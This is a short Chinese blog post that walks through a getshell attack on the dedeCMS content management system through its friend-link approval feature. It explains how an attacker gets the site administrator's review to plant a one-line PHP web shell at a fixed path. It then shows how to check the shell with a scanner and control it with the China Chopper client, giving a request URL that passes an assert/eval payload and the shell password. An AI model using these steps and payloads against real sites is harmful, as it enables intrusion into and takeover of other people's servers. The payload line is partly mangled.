杂类

dedeCMS所有版本友情链接getshell漏洞

``
使用

代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shellxin.lib.php

御剑字典添加/include/taglib/shellxin.lib.php测试是否存活即可

最后菜刀访问传参一句话http://site.com/include/taglib/shellxin.lib.php?a=assert&b[0][email protected]($_POST[xin]);

密码为xin

(1)

本文由 姬長信 创作,文章地址:https://blog.isoyu.com/archives/1873.html
采用知识共享署名4.0 国际许可协议进行许可。除注明转载/出处外,均为本站原创或翻译,转载前请务必署名。最后编辑时间为:2月 6, 2017 at 11:37 上午

热评文章

发表评论

[必填]

看不清?

提交后请等待三秒以免造成未提交成功和重复